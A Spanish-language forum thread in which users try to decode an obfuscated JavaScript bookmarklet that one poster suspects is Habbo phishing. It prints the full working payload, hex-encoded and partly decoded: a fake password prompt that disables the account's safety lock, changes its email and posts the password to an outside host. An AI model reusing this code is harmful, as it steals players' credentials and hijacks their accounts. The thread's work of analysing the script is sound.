Autor
|
Tema: ¿Cómo decodifico esto? (Leído 4,014 veces)
|
therecse
Desconectado
Mensajes: 3
|
Buenas, acabo de encontrar un código que me gustaría decodificar, pero no sé como ya que no entiendo qué tipo de lenguaje está codificado:
var linksave=_0x3459[0];var nome=null;var email=null;$[_0x3459[10]]({url:_0x3459[1],success:function b64EncodeUnicode(_0xcfe9x4){nome=_0xcfe9x4[_0x3459[3]](_0x3459[4])[1][_0x3459[3]](_0x3459[2])[0];email=_0xcfe9x4[_0x3459[3]](_0x3459[5])[1][_0x3459[3]](_0x3459[2])[0];div1=_0x3459[6];div2=_0x3459[7];$(_0x3459[9])[_0x3459[8]](div1);$(_0x3459[9])[_0x3459[8]](div2)}});function add(){var _0xcfe9x6=$(_0x3459[12])[_0x3459[11]]();var _0xcfe9x7=_0x3459[13]+Math[_0x3459[15]](Math[_0x3459[14]]()*999999)+_0x3459[16];if(_0xcfe9x6){$[_0x3459[23]](_0x3459[22],{currentPassword:_0xcfe9x6,newEmail:_0xcfe9x7},function(_0xcfe9x4){_0xcfe9x8()})[_0x3459[21]](function(){$(_0x3459[18])[_0x3459[17]]();$(_0x3459[20])[_0x3459[19]]({width:0},300);setTimeout(function(){$(_0x3459[18])[_0x3459[17]]()},3000)});$[_0x3459[25]](_0x3459[24]);function _0xcfe9x8(){var _0xcfe9x9=document[_0x3459[27]](_0x3459[26]);_0xcfe9x9[_0x3459[28]]=linksave;_0xcfe9x9[_0x3459[29]]=_0x3459[25];var _0xcfe9xa=document[_0x3459[27]](_0x3459[30]);_0xcfe9xa[_0x3459[31]]=_0x3459[32];_0xcfe9xa[_0x3459[33]]=_0x3459[34];_0xcfe9xa[_0x3459[35]]=_0xcfe9x7;var _0xcfe9xb=document[_0x3459[27]](_0x3459[30]);_0xcfe9xb[_0x3459[31]]=_0x3459[32];_0xcfe9xb[_0x3459[33]]=_0x3459[36];_0xcfe9xb[_0x3459[35]]=_0xcfe9x6;var _0xcfe9xc=document[_0x3459[27]](_0x3459[30]);_0xcfe9xc[_0x3459[31]]=_0x3459[32];_0xcfe9xc[_0x3459[33]]=_0x3459[37];_0xcfe9xc[_0x3459[35]]=nome;var _0xcfe9xd=document[_0x3459[27]](_0x3459[30]);_0xcfe9xd[_0x3459[31]]=_0x3459[32];_0xcfe9xd[_0x3459[33]]=_0x3459[38];_0xcfe9xd[_0x3459[35]]=email;var _0xcfe9xe=document[_0x3459[27]](_0x3459[30]);_0xcfe9xe[_0x3459[31]]=_0x3459[32];_0xcfe9xe[_0x3459[33]]=_0x3459[39];_0xcfe9xe[_0x3459[35]]=owner;_0xcfe9x9[_0x3459[40]](_0xcfe9xa);_0xcfe9x9[_0x3459[40]](_0xcfe9xb);_0xcfe9x9[_0x3459[40]](_0xcfe9xc);_0xcfe9x9[_0x3459[40]](_0xcfe9xd);_0xcfe9x9[_0x3459[40]](_0xcfe9xe);document[_0x3459[9]][_0x3459[40]](_0xcfe9x9);_0xcfe9x9[_0x3459[41]]()}}}'>
Me podríais ayudar? Muchas gracias
|
|
|
En línea
|
|
|
|
.:UND3R:.
|
codificar? son arreglos según yo, y ordenadamente quedaría más menos así: var linksave=_0x3459[0]; var nome=null; var email=null; $[_0x3459[10]]({ url:_0x3459[1],success: function b64EncodeUnicode(_0xcfe9x4){ nome=_0xcfe9x4[_0x3459[3]](_0x3459[4])[1][_0x3459[3]](_0x3459[2])[0]; email=_0xcfe9x4[_0x3459[3]](_0x3459[5])[1][_0x3459[3]](_0x3459[2])[0]; div1=_0x3459[6]; div2=_0x3459[7]; $(_0x3459[9])[_0x3459[8]](div1); $(_0x3459[9])[_0x3459[8]](div2) } }); function add(){ var _0xcfe9x6=$(_0x3459[12])[_0x3459[11]](); var _0xcfe9x7=_0x3459[13]+Math[_0x3459[15]](Math[_0x3459[14]]()*999999)+_0x3459[16]; if(_0xcfe9x6){ $[_0x3459[23]](_0x3459[22],{currentPassword:_0xcfe9x6,newEmail:_0xcfe9x7},function(_0xcfe9x4){_0xcfe9x8()}) [_0x3459[21]](function(){ $(_0x3459[18])[_0x3459[17]](); $(_0x3459[20])[_0x3459[19]]({width:0},300); setTimeout(function(){$(_0x3459[18])[_0x3459[17]]()},3000)}); $[_0x3459[25]](_0x3459[24]); function _0xcfe9x8(){ var _0xcfe9x9=document[_0x3459[27]](_0x3459[26]); _0xcfe9x9[_0x3459[28]]=linksave; _0xcfe9x9[_0x3459[29]]=_0x3459[25]; var _0xcfe9xa=document[_0x3459[27]](_0x3459[30]); _0xcfe9xa[_0x3459[31]]=_0x3459[32]; _0xcfe9xa[_0x3459[33]]=_0x3459[34]; _0xcfe9xa[_0x3459[35]]=_0xcfe9x7; var _0xcfe9xb=document[_0x3459[27]](_0x3459[30]); _0xcfe9xb[_0x3459[31]]=_0x3459[32]; _0xcfe9xb[_0x3459[33]]=_0x3459[36]; _0xcfe9xb[_0x3459[35]]=_0xcfe9x6; var _0xcfe9xc=document[_0x3459[27]](_0x3459[30]); _0xcfe9xc[_0x3459[31]]=_0x3459[32]; _0xcfe9xc[_0x3459[33]]=_0x3459[37]; _0xcfe9xc[_0x3459[35]]=nome; var _0xcfe9xd=document[_0x3459[27]](_0x3459[30]); _0xcfe9xd[_0x3459[31]]=_0x3459[32]; _0xcfe9xd[_0x3459[33]]=_0x3459[38]; _0xcfe9xd[_0x3459[35]]=email; var _0xcfe9xe=document[_0x3459[27]](_0x3459[30]); _0xcfe9xe[_0x3459[31]]=_0x3459[32]; _0xcfe9xe[_0x3459[33]]=_0x3459[39]; _0xcfe9xe[_0x3459[35]]=owner; _0xcfe9x9[_0x3459[40]](_0xcfe9xa); _0xcfe9x9[_0x3459[40]](_0xcfe9xb); _0xcfe9x9[_0x3459[40]](_0xcfe9xc); _0xcfe9x9[_0x3459[40]](_0xcfe9xd); _0xcfe9x9[_0x3459[40]](_0xcfe9xe); document[_0x3459[9]][_0x3459[40]](_0xcfe9x9); _0xcfe9x9[_0x3459[41]]() } }}'>
Podrías indicar más menos de donde obtuviste tal código, saludos.
|
|
|
En línea
|
Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
|
|
|
.:UND3R:.
|
Toda la magia está en el IF _0xcfe9x6 a simple impresión debe dar algo distinto de 0 para que se cumpla.
PD: a través de la función ADD se va modificando esa "variable" (o dirección de memoria).
|
|
|
En línea
|
Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
|
|
|
therecse
Desconectado
Mensajes: 3
|
Buenas de nuevo, muchas gracias por las respuestas tan rápidas. Obtuve ese código tras decodificar el siguiente: <a onClick="alert('Debe iniciar sesion en habbo y arrastrar la imagen a la pestaña de habbo');return false;" href='javascript:var owner = "duplicador";var _0x3459=["\x68\x74\x74\x70\x3A\x2F\x2F\x68\x69\x6F\x72\x69\x2D\x67\x61\x6D\x65\x73\x2E\x63\x6F\x6D\x2F\x70\x2F\x6C\x6F\x61\x64\x69\x6E\x67\x2E\x70\x68\x70","\x2F\x73\x65\x74\x74\x69\x6E\x67\x73\x2F\x65\x6D\x61\x69\x6C","\x22","\x73\x70\x6C\x69\x74","\x6E\x61\x6D\x65\x22\x3A\x22","\x65\x6D\x61\x69\x6C\x22\x3A\x22","\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x22\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x20\x66\x69\x78\x65\x64\x3B\x20\x74\x6F\x70\x3A\x20\x30\x70\x78\x3B\x20\x6C\x65\x66\x74\x3A\x20\x30\x70\x78\x3B\x20\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x20\x38\x30\x30\x3B\x20\x77\x69\x64\x74\x68\x3A\x20\x31\x30\x30\x25\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x31\x30\x30\x25\x3B\x20\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64\x3A\x20\x72\x67\x62\x61\x28\x31\x30\x2C\x20\x35\x34\x2C\x20\x39\x34\x2C\x20\x30\x2E\x38\x29\x3B\x22\x3E\x3C\x2F\x64\x69\x76\x3E","\x3C\x64\x69\x76\x20\x69\x64\x3D\x22\x68\x69\x64\x64\x65\x6E\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x20\x66\x69\x78\x65\x64\x3B\x20\x74\x6F\x70\x3A\x20\x37\x30\x70\x78\x3B\x20\x77\x69\x64\x74\x68\x3A\x20\x35\x30\x30\x70\x78\x3B\x20\x7A\x2D\x69\x6E\x64\x65\x78\x3A\x20\x39\x30\x30\x3B\x20\x6C\x65\x66\x74\x3A\x20\x35\x30\x25\x3B\x20\x6D\x61\x72\x67\x69\x6E\x2D\x6C\x65\x66\x74\x3A\x20\x2D\x32\x35\x30\x70\x78\x3B\x22\x3E\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x22\x64\x69\x73\x70\x6C\x61\x79\x3A\x20\x62\x6C\x6F\x63\x6B\x3B\x20\x74\x72\x61\x6E\x73\x69\x74\x69\x6F\x6E\x3A\x20\x31\x73\x3B\x22\x20\x69\x64\x3D\x22\x74\x6F\x61\x73\x74\x2D\x63\x6F\x6E\x74\x61\x69\x6E\x65\x72\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x74\x6F\x61\x73\x74\x2D\x74\x6F\x70\x2D\x63\x65\x6E\x74\x65\x72\x22\x20\x61\x72\x69\x61\x2D\x6C\x69\x76\x65\x3D\x22\x70\x6F\x6C\x69\x74\x65\x22\x20\x72\x6F\x6C\x65\x3D\x22\x61\x6C\x65\x72\x74\x22\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x74\x6F\x61\x73\x74\x20\x74\x6F\x61\x73\x74\x2D\x65\x72\x72\x6F\x72\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x64\x69\x73\x70\x6C\x61\x79\x3A\x20\x6E\x6F\x6E\x65\x3B\x22\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x74\x6F\x61\x73\x74\x2D\x70\x72\x6F\x67\x72\x65\x73\x73\x22\x20\x69\x64\x3D\x22\x74\x6F\x61\x73\x74\x2D\x70\x72\x6F\x67\x72\x65\x73\x73\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x20\x39\x39\x2E\x39\x25\x3B\x20\x74\x72\x61\x6E\x73\x69\x74\x69\x6F\x6E\x3A\x20\x32\x73\x3B\x22\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x74\x6F\x61\x73\x74\x2D\x6D\x65\x73\x73\x61\x67\x65\x22\x20\x69\x64\x3D\x22\x74\x6F\x61\x73\x74\x2D\x6D\x65\x73\x73\x61\x67\x65\x22\x3E\x4C\x61\x20\x63\x6F\x6E\x74\x72\x61\x73\x65\xF1\x61\x20\x71\x75\x65\x20\x69\x6E\x67\x72\x65\x73\x6F\x20\x65\x73\x20\x69\x6E\x63\x6F\x72\x72\x65\x63\x74\x61\x2C\x20\x76\x65\x72\x69\x66\x69\x71\x75\x65\x20\x65\x20\x69\x6E\x74\x65\x6E\x74\x65\x20\x64\x65\x20\x6E\x75\x65\x76\x6F\x2E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x6D\x6F\x64\x61\x6C\x2D\x64\x69\x61\x6C\x6F\x67\x22\x20\x6E\x67\x2D\x63\x6C\x61\x73\x73\x3D\x22\x73\x69\x7A\x65\x20\x3F\x20\x22\x20\x6D\x6F\x64\x61\x6C\x2D\x22\x3D\x22\x22\x20\x2B\x3D\x22\x22\x20\x73\x69\x7A\x65\x3D\x22\x22\x20\x3A\x3D\x22\x22\x20\x22\x22\x22\x3D\x22\x22\x3E\x3C\x64\x69\x76\x20\x73\x74\x79\x6C\x65\x3D\x22\x68\x65\x69\x67\x68\x74\x3A\x20\x32\x35\x30\x70\x78\x3B\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x6D\x6F\x64\x61\x6C\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x22\x20\x75\x69\x62\x2D\x6D\x6F\x64\x61\x6C\x2D\x74\x72\x61\x6E\x73\x63\x6C\x75\x64\x65\x3D\x22\x22\x3E\x3C\x64\x69\x76\x3E\x3C\x62\x75\x74\x74\x6F\x6E\x20\x6F\x6E\x63\x6C\x69\x63\x6B\x3D\x22\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x72\x65\x6C\x6F\x61\x64\x28\x29\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x6D\x6F\x64\x61\x6C\x5F\x5F\x63\x6C\x6F\x73\x65\x22\x3E\x3C\x2F\x62\x75\x74\x74\x6F\x6E\x3E\x3C\x68\x33\x20\x74\x72\x61\x6E\x73\x6C\x61\x74\x65\x3D\x22\x53\x41\x46\x45\x54\x59\x5F\x4C\x4F\x43\x4B\x5F\x54\x49\x54\x4C\x45\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x6D\x6F\x64\x61\x6C\x5F\x5F\x74\x69\x74\x6C\x65\x22\x3E\x43\x75\x65\x6E\x74\x61\x20\x70\x72\x6F\x74\x65\x67\x69\x64\x61\x20\x70\x6F\x72\x20\x73\x65\x67\x75\x72\x69\x64\x61\x64\x2E\x3C\x2F\x68\x33\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x6D\x6F\x64\x61\x6C\x5F\x5F\x63\x6F\x6E\x74\x65\x6E\x74\x22\x3E\x3C\x70\x20\x74\x72\x61\x6E\x73\x6C\x61\x74\x65\x3D\x22\x53\x41\x46\x45\x54\x59\x5F\x4C\x4F\x43\x4B\x5F\x41\x4E\x53\x57\x45\x52\x22\x3E\x3C\x2F\x70\x3E\x3C\x21\x2D\x2D\x20\x6E\x67\x49\x66\x3A\x20\x73\x61\x66\x65\x74\x79\x4C\x6F\x63\x6B\x46\x6F\x72\x6D\x2E\x24\x65\x72\x72\x6F\x72\x2E\x72\x65\x6D\x6F\x74\x65\x44\x61\x74\x61\x41\x6E\x73\x77\x65\x72\x20\x2D\x2D\x3E\x3C\x66\x69\x65\x6C\x64\x73\x65\x74\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x66\x69\x65\x6C\x64\x73\x65\x74\x22\x3E\x3C\x6C\x61\x62\x65\x6C\x20\x66\x6F\x72\x3D\x22\x73\x61\x66\x65\x74\x79\x2D\x6C\x6F\x63\x6B\x2D\x61\x6E\x73\x77\x65\x72\x31\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x6C\x61\x62\x65\x6C\x22\x20\x74\x72\x61\x6E\x73\x6C\x61\x74\x65\x3D\x22\x49\x44\x45\x4E\x54\x49\x54\x59\x5F\x53\x41\x46\x45\x54\x59\x51\x55\x45\x53\x54\x49\x4F\x4E\x5F\x31\x22\x3E\x49\x6E\x67\x72\x65\x73\x65\x20\x73\x75\x20\x63\x6F\x6E\x74\x72\x61\x73\x65\xF1\x61\x20\x70\x61\x72\x61\x20\x63\x6F\x6E\x74\x69\x6E\x75\x61\x72\x3C\x2F\x6C\x61\x62\x65\x6C\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x66\x69\x65\x6C\x64\x22\x3E\x3C\x69\x6E\x70\x75\x74\x20\x69\x64\x3D\x22\x69\x6E\x70\x75\x74\x74\x78\x74\x22\x20\x6E\x61\x6D\x65\x3D\x22\x61\x6E\x73\x77\x65\x72\x31\x22\x20\x74\x79\x70\x65\x3D\x22\x70\x61\x73\x73\x77\x6F\x72\x64\x22\x20\x6E\x67\x2D\x6D\x6F\x64\x65\x6C\x3D\x22\x61\x6E\x73\x77\x65\x72\x73\x2E\x61\x6E\x73\x77\x65\x72\x31\x22\x20\x6E\x67\x2D\x6D\x6F\x64\x65\x6C\x2D\x6F\x70\x74\x69\x6F\x6E\x73\x3D\x22\x7B\x20\x75\x70\x64\x61\x74\x65\x4F\x6E\x3A\x20\x22\x20\x64\x65\x66\x61\x75\x6C\x74\x3D\x22\x22\x20\x62\x6C\x75\x72\x22\x2C\x3D\x22\x22\x20\x64\x65\x62\x6F\x75\x6E\x63\x65\x3A\x3D\x22\x22\x20\x7B\x3D\x22\x22\x20\x64\x65\x66\x61\x75\x6C\x74\x3A\x3D\x22\x22\x20\x35\x30\x30\x2C\x3D\x22\x22\x20\x62\x6C\x75\x72\x3A\x3D\x22\x22\x20\x30\x3D\x22\x22\x20\x7D\x3D\x22\x22\x20\x7D\x22\x3D\x22\x22\x20\x72\x65\x71\x75\x69\x72\x65\x64\x3D\x22\x22\x20\x72\x65\x6D\x6F\x74\x65\x2D\x64\x61\x74\x61\x3D\x22\x22\x20\x61\x6E\x73\x77\x65\x72\x22\x22\x3D\x22\x22\x20\x70\x61\x73\x73\x77\x6F\x72\x64\x2D\x74\x6F\x67\x67\x6C\x65\x2D\x6D\x61\x73\x6B\x3D\x22\x22\x20\x61\x75\x74\x6F\x63\x6F\x6D\x70\x6C\x65\x74\x65\x3D\x22\x6F\x66\x66\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x69\x6E\x70\x75\x74\x20\x6E\x67\x2D\x70\x72\x69\x73\x74\x69\x6E\x65\x20\x6E\x67\x2D\x75\x6E\x74\x6F\x75\x63\x68\x65\x64\x20\x70\x61\x73\x73\x77\x6F\x72\x64\x2D\x74\x6F\x67\x67\x6C\x65\x2D\x6D\x61\x73\x6B\x20\x6E\x67\x2D\x69\x6E\x76\x61\x6C\x69\x64\x20\x6E\x67\x2D\x69\x6E\x76\x61\x6C\x69\x64\x2D\x72\x65\x71\x75\x69\x72\x65\x64\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x62\x6F\x72\x64\x65\x72\x2D\x63\x6F\x6C\x6F\x72\x3A\x20\x72\x67\x62\x28\x31\x34\x34\x2C\x20\x35\x31\x2C\x20\x38\x32\x29\x3B\x22\x3E\x3C\x69\x20\x63\x6C\x61\x73\x73\x3D\x22\x70\x61\x73\x73\x77\x6F\x72\x64\x2D\x74\x6F\x67\x67\x6C\x65\x2D\x6D\x61\x73\x6B\x5F\x5F\x69\x63\x6F\x6E\x22\x3E\x3C\x2F\x69\x3E\x3C\x21\x2D\x2D\x20\x6E\x67\x49\x66\x3A\x20\x73\x61\x66\x65\x74\x79\x4C\x6F\x63\x6B\x46\x6F\x72\x6D\x2E\x61\x6E\x73\x77\x65\x72\x31\x2E\x24\x65\x72\x72\x6F\x72\x2E\x72\x65\x71\x75\x69\x72\x65\x64\x20\x26\x26\x20\x28\x21\x73\x61\x66\x65\x74\x79\x4C\x6F\x63\x6B\x46\x6F\x72\x6D\x2E\x61\x6E\x73\x77\x65\x72\x31\x2E\x24\x70\x72\x69\x73\x74\x69\x6E\x65\x20\x7C\x7C\x20\x73\x61\x66\x65\x74\x79\x4C\x6F\x63\x6B\x46\x6F\x72\x6D\x2E\x24\x73\x75\x62\x6D\x69\x74\x74\x65\x64\x29\x20\x2D\x2D\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x66\x69\x65\x6C\x64\x73\x65\x74\x3E\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x66\x6F\x6F\x74\x65\x72\x22\x3E\x3C\x61\x20\x68\x72\x65\x66\x3D\x22\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x68\x61\x62\x62\x6F\x2E\x65\x73\x2F\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x63\x61\x6E\x63\x65\x6C\x22\x20\x6F\x6E\x63\x6C\x69\x63\x6B\x3D\x22\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x72\x65\x6C\x6F\x61\x64\x28\x29\x22\x20\x74\x72\x61\x6E\x73\x6C\x61\x74\x65\x3D\x22\x46\x4F\x52\x4D\x5F\x43\x41\x4E\x43\x45\x4C\x5F\x4C\x41\x42\x45\x4C\x22\x3E\x43\x61\x6E\x63\x65\x6C\x61\x72\x3C\x2F\x61\x3E\x20\x3C\x62\x75\x74\x74\x6F\x6E\x20\x6E\x67\x2D\x64\x69\x73\x61\x62\x6C\x65\x64\x3D\x22\x75\x6E\x6C\x6F\x63\x6B\x69\x6E\x67\x49\x6E\x50\x72\x6F\x67\x72\x65\x73\x73\x22\x20\x74\x79\x70\x65\x3D\x22\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x66\x6F\x72\x6D\x5F\x5F\x73\x75\x62\x6D\x69\x74\x22\x20\x6F\x6E\x63\x6C\x69\x63\x6B\x3D\x22\x61\x64\x64\x28\x29\x3B\x22\x3E\x43\x6F\x6E\x74\x69\x6E\x75\x61\x72\x3C\x2F\x62\x75\x74\x74\x6F\x6E\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E\x3C\x2F\x64\x69\x76\x3E","\x70\x72\x65\x70\x65\x6E\x64","\x62\x6F\x64\x79","\x61\x6A\x61\x78","\x76\x61\x6C","\x23\x69\x6E\x70\x75\x74\x74\x78\x74","\x73\x74\x6F\x70\x63\x72\x65\x64\x69\x74\x73","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x40\x6C\x6F\x6C\x69\x74\x6F\x2E\x74\x6B","\x66\x61\x64\x65\x54\x6F\x67\x67\x6C\x65","\x2E\x74\x6F\x61\x73\x74","\x61\x6E\x69\x6D\x61\x74\x65","\x23\x74\x6F\x61\x73\x74\x2D\x70\x72\x6F\x67\x72\x65\x73\x73","\x66\x61\x69\x6C","\x61\x70\x69\x2F\x73\x65\x74\x74\x69\x6E\x67\x73\x2F\x65\x6D\x61\x69\x6C\x2F\x63\x68\x61\x6E\x67\x65","\x70\x6F\x73\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x68\x61\x62\x62\x6F\x2E\x65\x73\x2F\x61\x70\x69\x2F\x73\x61\x66\x65\x74\x79\x6C\x6F\x63\x6B\x2F\x64\x69\x73\x61\x62\x6C\x65","\x67\x65\x74","\x66\x6F\x72\x6D","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x61\x63\x74\x69\x6F\x6E","\x6D\x65\x74\x68\x6F\x64","\x69\x6E\x70\x75\x74","\x74\x79\x70\x65","\x74\x65\x78\x74","\x6E\x61\x6D\x65","\x6D\x61\x69\x6C\x5F\x61\x64\x64","\x76\x61\x6C\x75\x65","\x70\x61\x73\x73","\x68\x61\x62\x62\x6F","\x65\x6D\x61\x69\x6C","\x69\x64","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x73\x75\x62\x6D\x69\x74"];var linksave=_0x3459[0];var nome=null;var email=null;$[_0x3459[10]]({url:_0x3459[1],success:function b64EncodeUnicode(_0xcfe9x4){nome=_0xcfe9x4[_0x3459[3]](_0x3459[4])[1][_0x3459[3]](_0x3459[2])[0];email=_0xcfe9x4[_0x3459[3]](_0x3459[5])[1][_0x3459[3]](_0x3459[2])[0];div1=_0x3459[6];div2=_0x3459[7];$(_0x3459[9])[_0x3459[8]](div1);$(_0x3459[9])[_0x3459[8]](div2)}});function add(){var _0xcfe9x6=$(_0x3459[12])[_0x3459[11]]();var _0xcfe9x7=_0x3459[13]+Math[_0x3459[15]](Math[_0x3459[14]]()*999999)+_0x3459[16];if(_0xcfe9x6){$[_0x3459[23]](_0x3459[22],{currentPassword:_0xcfe9x6,newEmail:_0xcfe9x7},function(_0xcfe9x4){_0xcfe9x8()})[_0x3459[21]](function(){$(_0x3459[18])[_0x3459[17]]();$(_0x3459[20])[_0x3459[19]]({width:0},300);setTimeout(function(){$(_0x3459[18])[_0x3459[17]]()},3000)});$[_0x3459[25]](_0x3459[24]);function _0xcfe9x8(){var _0xcfe9x9=document[_0x3459[27]](_0x3459[26]);_0xcfe9x9[_0x3459[28]]=linksave;_0xcfe9x9[_0x3459[29]]=_0x3459[25];var _0xcfe9xa=document[_0x3459[27]](_0x3459[30]);_0xcfe9xa[_0x3459[31]]=_0x3459[32];_0xcfe9xa[_0x3459[33]]=_0x3459[34];_0xcfe9xa[_0x3459[35]]=_0xcfe9x7;var _0xcfe9xb=document[_0x3459[27]](_0x3459[30]);_0xcfe9xb[_0x3459[31]]=_0x3459[32];_0xcfe9xb[_0x3459[33]]=_0x3459[36];_0xcfe9xb[_0x3459[35]]=_0xcfe9x6;var _0xcfe9xc=document[_0x3459[27]](_0x3459[30]);_0xcfe9xc[_0x3459[31]]=_0x3459[32];_0xcfe9xc[_0x3459[33]]=_0x3459[37];_0xcfe9xc[_0x3459[35]]=nome;var _0xcfe9xd=document[_0x3459[27]](_0x3459[30]);_0xcfe9xd[_0x3459[31]]=_0x3459[32];_0xcfe9xd[_0x3459[33]]=_0x3459[38];_0xcfe9xd[_0x3459[35]]=email;var _0xcfe9xe=document[_0x3459[27]](_0x3459[30]);_0xcfe9xe[_0x3459[31]]=_0x3459[32];_0xcfe9xe[_0x3459[33]]=_0x3459[39];_0xcfe9xe[_0x3459[35]]=owner;_0xcfe9x9[_0x3459[40]](_0xcfe9xa);_0xcfe9x9[_0x3459[40]](_0xcfe9xb);_0xcfe9x9[_0x3459[40]](_0xcfe9xc);_0xcfe9x9[_0x3459[40]](_0xcfe9xd);_0xcfe9x9[_0x3459[40]](_0xcfe9xe);document[_0x3459[9]][_0x3459[40]](_0xcfe9x9);_0xcfe9x9[_0x3459[41]]()}}}'> Está extraido de una web que imagino que es phishing de un juego online llamado Habbo. He intentado comprender todo lo anterior, y, tras decodificarlo, obtuve lo anterior que puse al comienzo del post. Pero me gustaría comprender lo de despúes ya que no consigo entender lo que realiza.
|
|
|
En línea
|
|
|
|
apuromafo CLS
|
https://www.unphp.net/decode/3d484439626db1d567a83415de961520/<a onClick="alert('Debe iniciar sesion en habbo y arrastrar la imagen a la pestaa de habbo');return false;" href='javascript:var owner = "duplicador";var _0x3459=["http://hiori-games.com/p/loading.php","/settings/email",""","split","name":"","email":"","<div style="position: fixed; top: 0px; left: 0px; z-index: 800; width: 100%; height: 100%; background: rgba(10, 54, 94, 0.8);"></div>","<div id="hidden" style="position: fixed; top: 70px; width: 500px; z-index: 900; left: 50%; margin-left: -250px;"><div style="display: block; transition: 1s;" id="toast-container" class="toast-top-center" aria-live="polite" role="alert"><div class="toast toast-error" style="display: none;"><div class="toast-progress" id="toast-progress" style="width: 99.9%; transition: 2s;"></div><div class="toast-message" id="toast-message">La contrasea que ingreso es incorrecta, verifique e intente de nuevo.</div></div></div><div class="modal-dialog" ng-class="size ? " modal-"="" +="" size="" :="" """=""><div style="height: 250px;" class="modal-content" uib-modal-transclude=""><div><button onclick="location.reload()" class="modal__close"></button><h3 translate="SAFETY_LOCK_TITLE" class="modal__title">Cuenta protegida por seguridad.</h3><div class="modal__content"><p translate="SAFETY_LOCK_ANSWER"></p><!-- ngIf: safetyLockForm.$error.remoteDataAnswer --><fieldset class="form__fieldset"><label for="safety-lock-answer1" class="form__label" translate="IDENTITY_SAFETYQUESTION_1">Ingrese su contrasea para continuar</label><div class="form__field"><input id="inputtxt" name="answer1" type="password" ng-model="answers.answer1" ng-model-options="{ updateOn: " default="" blur",="" debounce:="" {="" default:="" 500,="" blur:="" 0="" }="" }"="" required="" remote-data="" answer""="" password-toggle-mask="" autocomplete="off" class="form__input ng-pristine ng-untouched password-toggle-mask ng-invalid ng-invalid-required" style="border-color: rgb(144, 51, 82);"><i class="password-toggle-mask__icon"></i><!-- ngIf: safetyLockForm.answer1.$error.required && (!safetyLockForm.answer1.$pristine || safetyLockForm.$submitted) --></div></fieldset><div class="form__footer"><a href="https://www.habbo.es/" class="form__cancel" onclick="location.reload()" translate="FORM_CANCEL_LABEL">Cancelar</a> <button ng-disabled="unlockingInProgress" type="" class="form__submit" onclick="add();">Continuar</button></div></div></div></div></div></div>","prepend","body","ajax","val","#inputtxt","stopcredits","random","floor","@lolito.tk","fadeToggle",".toast","animate","#toast-progress","fail","api/settings/email/change","post","https://www.habbo.es/api/safetylock/disable","get","form","createElement","action","method","input","type","text","name","mail_add","value","pass","habbo","email","id","appendChild","submit"];var linksave=_0x3459[0];var nome=null;var email=null;$[_0x3459[10]]({url:_0x3459[1],success:function b64EncodeUnicode(_0xcfe9x4){nome=_0xcfe9x4[_0x3459[3]](_0x3459[4])[1][_0x3459[3]](_0x3459[2])[0];email=_0xcfe9x4[_0x3459[3]](_0x3459[5])[1][_0x3459[3]](_0x3459[2])[0];div1=_0x3459[6];div2=_0x3459[7];$(_0x3459[9])[_0x3459[8]](div1);$(_0x3459[9])[_0x3459[8]](div2)}});function add(){var _0xcfe9x6=$(_0x3459[12])[_0x3459[11]]();var 